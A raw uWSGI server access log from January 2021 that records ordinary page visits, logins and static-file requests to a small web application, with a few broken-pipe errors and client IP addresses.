bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2903/4123] 114.42.220.207 () {38 vars in 873 bytes} [Fri Jan 15 01:31:25 2021] GET /all-0-0-0 => generated 13838 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2904/4124] 219.228.146.126 () {40 vars in 898 bytes} [Fri Jan 15 01:31:26 2021] GET /single/5 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2905/4125] 219.228.146.126 () {40 vars in 900 bytes} [Fri Jan 15 01:31:26 2021] GET /single/5/ => generated 9500 bytes in 18 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2906/4126] 114.42.220.207 () {38 vars in 873 bytes} [Fri Jan 15 01:31:26 2021] GET /all-0-0-0 => generated 13838 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2907/4127] 114.42.220.207 () {38 vars in 876 bytes} [Fri Jan 15 01:31:27 2021] GET /single-an-3 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2908/4128] 114.42.220.207 () {38 vars in 878 bytes} [Fri Jan 15 01:31:27 2021] GET /single-an-3/ => generated 3121 bytes in 6 msecs (HTTP/1.1 200) 5 headers in 167 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2909/4129] 219.228.146.126 () {40 vars in 900 bytes} [Fri Jan 15 01:31:34 2021] GET /single/18 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2910/4130] 219.228.146.126 () {40 vars in 902 bytes} [Fri Jan 15 01:31:34 2021] GET /single/18/ => generated 9400 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2911/4131] 219.228.146.116 () {36 vars in 666 bytes} [Fri Jan 15 01:32:06 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2912/4132] 219.228.146.116 () {36 vars in 668 bytes} [Fri Jan 15 01:32:06 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4133] 219.228.146.116 () {38 vars in 763 bytes} [Fri Jan 15 01:32:06 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4134] 219.228.146.116 () {38 vars in 785 bytes} [Fri Jan 15 01:32:06 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4135] 219.228.146.116 () {38 vars in 767 bytes} [Fri Jan 15 01:32:06 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4136] 219.228.146.116 () {38 vars in 765 bytes} [Fri Jan 15 01:32:06 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4137] 219.228.146.116 () {38 vars in 771 bytes} [Fri Jan 15 01:32:06 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2913/4138] 223.104.213.30 () {36 vars in 664 bytes} [Fri Jan 15 01:32:29 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2914/4139] 223.104.213.30 () {36 vars in 666 bytes} [Fri Jan 15 01:32:29 2021] GET /login/ => generated 6428 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4140] 223.104.213.30 () {38 vars in 765 bytes} [Fri Jan 15 01:32:29 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4141] 223.104.213.30 () {38 vars in 783 bytes} [Fri Jan 15 01:32:29 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4142] 223.104.213.30 () {38 vars in 763 bytes} [Fri Jan 15 01:32:29 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4143] 223.104.213.30 () {38 vars in 761 bytes} [Fri Jan 15 01:32:29 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 223.104.213.30 client_port: 35398] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 223.104.213.30 client_port: 35142] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2915/4144] 223.104.213.30 () {38 vars in 755 bytes} [Fri Jan 15 01:32:31 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4145] 223.104.213.30 () {38 vars in 761 bytes} [Fri Jan 15 01:32:31 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4146] 223.104.213.30 () {38 vars in 765 bytes} [Fri Jan 15 01:32:31 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4147] 223.104.213.30 () {38 vars in 763 bytes} [Fri Jan 15 01:32:31 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4148] 223.104.213.30 () {38 vars in 783 bytes} [Fri Jan 15 01:32:31 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4149] 223.104.213.30 () {38 vars in 769 bytes} [Fri Jan 15 01:32:31 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4150] 223.104.213.30 () {38 vars in 742 bytes} [Fri Jan 15 01:32:31 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4151] 223.104.213.30 () {38 vars in 758 bytes} [Fri Jan 15 01:32:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4152] 223.104.213.30 () {38 vars in 744 bytes} [Fri Jan 15 01:32:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4153] 223.104.213.30 () {38 vars in 760 bytes} [Fri Jan 15 01:32:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4154] 223.104.213.30 () {38 vars in 750 bytes} [Fri Jan 15 01:32:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4155] 223.104.213.30 () {38 vars in 815 bytes} [Fri Jan 15 01:32:34 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2916/4156] 219.228.146.176 () {38 vars in 756 bytes} [Fri Jan 15 01:33:02 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2917/4157] 219.228.146.176 () {38 vars in 759 bytes} [Fri Jan 15 01:33:02 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4158] 219.228.146.176 () {38 vars in 765 bytes} [Fri Jan 15 01:33:02 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4159] 219.228.146.176 () {38 vars in 748 bytes} [Fri Jan 15 01:33:02 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4160] 219.228.146.176 () {38 vars in 767 bytes} [Fri Jan 15 01:33:02 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4161] 219.228.146.176 () {38 vars in 773 bytes} [Fri Jan 15 01:33:02 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4162] 219.228.146.176 () {38 vars in 787 bytes} [Fri Jan 15 01:33:02 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4163] 219.228.146.176 () {38 vars in 769 bytes} [Fri Jan 15 01:33:02 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4164] 219.228.146.176 () {38 vars in 762 bytes} [Fri Jan 15 01:33:02 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4165] 219.228.146.176 () {38 vars in 764 bytes} [Fri Jan 15 01:33:02 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4166] 219.228.146.176 () {38 vars in 754 bytes} [Fri Jan 15 01:33:02 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4167] 219.228.146.176 () {38 vars in 746 bytes} [Fri Jan 15 01:33:03 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4168] 219.228.146.176 () {38 vars in 794 bytes} [Fri Jan 15 01:33:04 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4169] 219.228.146.176 () {38 vars in 800 bytes} [Fri Jan 15 01:33:04 2021] GET /static/img/back-top-btn.png => generated 1789 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2918/4170] 219.228.146.176 () {50 vars in 994 bytes} [Fri Jan 15 01:33:15 2021] POST /login/ => generated 27 bytes in 23 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2919/4171] 219.228.146.176 () {40 vars in 805 bytes} [Fri Jan 15 01:33:15 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2920/4172] 219.228.146.176 () {40 vars in 807 bytes} [Fri Jan 15 01:33:15 2021] GET /home/ => generated 11127 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4173] 219.228.146.176 () {38 vars in 809 bytes} [Fri Jan 15 01:33:15 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4174] 219.228.146.176 () {38 vars in 803 bytes} [Fri Jan 15 01:33:15 2021] GET /static/img/t_photo/4_math.png => generated 587232 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4175] 219.228.146.176 () {38 vars in 805 bytes} [Fri Jan 15 01:33:15 2021] GET /static/img/t_photo/10_love.jpg => generated 15609 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2921/4176] 219.228.146.176 () {40 vars in 814 bytes} [Fri Jan 15 01:33:22 2021] GET /all-0-0-0 => generated 13893 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4177] 219.228.146.176 () {38 vars in 805 bytes} [Fri Jan 15 01:33:22 2021] GET /static/img/t_photo/wrong.jpg => generated 1420 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4178] 219.228.146.176 () {38 vars in 837 bytes} [Fri Jan 15 01:33:22 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 215061 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4179] 219.228.146.176 () {38 vars in 807 bytes} [Fri Jan 15 01:33:22 2021] GET /static/img/t_photo/16_OIP.jpg => generated 9197 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4180] 219.228.146.176 () {38 vars in 763 bytes} [Fri Jan 15 01:33:22 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4181] 219.228.146.176 () {38 vars in 837 bytes} [Fri Jan 15 01:33:22 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 16999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4182] 219.228.146.176 () {38 vars in 765 bytes} [Fri Jan 15 01:33:22 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2922/4183] 219.228.146.195 () {36 vars in 872 bytes} [Fri Jan 15 01:33:32 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2923/4184] 219.228.146.195 () {36 vars in 874 bytes} [Fri Jan 15 01:33:32 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4185] 219.228.146.195 () {38 vars in 958 bytes} [Fri Jan 15 01:33:32 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4186] 219.228.146.195 () {38 vars in 980 bytes} [Fri Jan 15 01:33:32 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4187] 219.228.146.195 () {38 vars in 962 bytes} [Fri Jan 15 01:33:32 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4188] 219.228.146.195 () {38 vars in 960 bytes} [Fri Jan 15 01:33:32 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4189] 219.228.146.195 () {38 vars in 966 bytes} [Fri Jan 15 01:33:32 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4190] 219.228.146.195 () {38 vars in 941 bytes} [Fri Jan 15 01:33:32 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4191] 219.228.146.195 () {38 vars in 939 bytes} [Fri Jan 15 01:33:32 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4192] 219.228.146.195 () {38 vars in 957 bytes} [Fri Jan 15 01:33:32 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4193] 219.228.146.195 () {38 vars in 955 bytes} [Fri Jan 15 01:33:32 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4194] 219.228.146.195 () {38 vars in 947 bytes} [Fri Jan 15 01:33:32 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.195 client_port: 26577] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 25874|app: 0|req: 2924/4195] 219.228.146.176 () {40 vars in 816 bytes} [Fri Jan 15 01:33:33 2021] GET /single/1 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2925/4196] 219.228.146.176 () {40 vars in 818 bytes} [Fri Jan 15 01:33:33 2021] GET /single/1/ => generated 9462 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2926/4197] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:33:38 2021] GET /all-0-0-0 => generated 13893 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2927/4198] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:33:41 2021] GET /single/16 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2928/4199] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 01:33:41 2021] GET /single/16/ => generated 9423 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2929/4200] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:33:45 2021] GET /all-0-0-0 => generated 13893 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +0 +[] +[pid: 25874|app: 0|req: 2930/4201] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:33:52 2021] GET /all-9-0-0 => generated 10264 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2931/4202] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:33:54 2021] GET /single/10 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2932/4203] 219.228.146.176 () {40 vars in 821 bytes} [Fri Jan 15 01:33:54 2021] GET /single/10/ => generated 9484 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2933/4204] 39.144.39.194 () {36 vars in 663 bytes} [Fri Jan 15 01:33:55 2021] GET /login => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2934/4205] 39.144.39.194 () {36 vars in 665 bytes} [Fri Jan 15 01:33:56 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4206] 39.144.39.194 () {38 vars in 759 bytes} [Fri Jan 15 01:33:56 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4207] 39.144.39.194 () {38 vars in 761 bytes} [Fri Jan 15 01:33:56 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4208] 39.144.39.194 () {38 vars in 763 bytes} [Fri Jan 15 01:33:56 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4209] 39.144.39.194 () {38 vars in 781 bytes} [Fri Jan 15 01:33:56 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2935/4210] 39.144.39.194 () {38 vars in 754 bytes} [Fri Jan 15 01:33:57 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4211] 39.144.39.194 () {38 vars in 760 bytes} [Fri Jan 15 01:33:57 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4212] 39.144.39.194 () {38 vars in 782 bytes} [Fri Jan 15 01:33:57 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4213] 39.144.39.194 () {38 vars in 764 bytes} [Fri Jan 15 01:33:57 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: -1|req: -1/4214] 39.144.39.194 () {38 vars in 768 bytes} [Fri Jan 15 01:33:57 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2936/4215] 219.228.146.195 () {38 vars in 865 bytes} [Fri Jan 15 01:33:57 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +0 +[] +[pid: 25874|app: 0|req: 2937/4216] 219.228.146.176 () {40 vars in 819 bytes} [Fri Jan 15 01:33:58 2021] GET /all-9-0-0 => generated 10264 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4217] 39.144.39.194 () {38 vars in 741 bytes} [Fri Jan 15 01:33:58 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4218] 39.144.39.194 () {38 vars in 743 bytes} [Fri Jan 15 01:33:58 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4219] 39.144.39.194 () {38 vars in 759 bytes} [Fri Jan 15 01:33:59 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4220] 39.144.39.194 () {38 vars in 757 bytes} [Fri Jan 15 01:33:59 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4221] 39.144.39.194 () {38 vars in 749 bytes} [Fri Jan 15 01:33:59 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4222] 39.144.39.194 () {38 vars in 803 bytes} [Fri Jan 15 01:34:00 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 25874|app: 0|req: 2938/4223] 219.228.146.176 () {40 vars in 815 bytes} [Fri Jan 15 01:34:00 2021] GET /all-0-0-0 => generated 13893 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2939/4224] 219.228.146.195 () {48 vars in 1009 bytes} [Fri Jan 15 01:34:01 2021] POST /login/ => generated 27 bytes in 25 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2940/4225] 219.228.146.195 () {40 vars in 913 bytes} [Fri Jan 15 01:34:01 2021] GET /home/ => generated 11134 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 25874|app: 0|req: 2941/4226] 219.228.146.176 () {40 vars in 809 bytes} [Fri Jan 15 01:34:03 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2942/4227] 219.228.146.176 () {40 vars in 811 bytes} [Fri Jan 15 01:34:03 2021] GET /home/ => generated 11127 bytes in 14 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: 0|req: 2943/4228] 219.228.146.195 () {40 vars in 920 bytes} [Fri Jan 15 01:34:05 2021] GET /all-0-0-0 => generated 13900 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 25874|app: -1|req: -1/4229] 219.228.146.195 () {40 vars in 929 bytes} [Fri Jan 15 01:34:05 2021] GET /static/img/t_photo/18_%E4%B8%8D%E7%86%AC%E5%A4%9C.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 25874|app: 0|req: 2944/4230] 219.228.146.176 () {42 vars in 842 bytes} [Fri Jan 15 01:34:26 2021] GET /home/ => generated 11127 bytes in 16 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 0) +[pid: 25874|app: -1|req: -1/4231] 219.228.146.176 () {42 vars in 890 bytes} [Fri Jan 15 01:34:26 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4232] 219.228.146.176 () {42 vars in 851 bytes} [Fri Jan 15 01:34:26 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4233] 219.228.146.176 () {42 vars in 873 bytes} [Fri Jan 15 01:34:26 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 25874|app: -1|req: -1/4234] 219.228.146.176 () {42 vars in 840 bytes} [Fri Jan 15 01:34:26 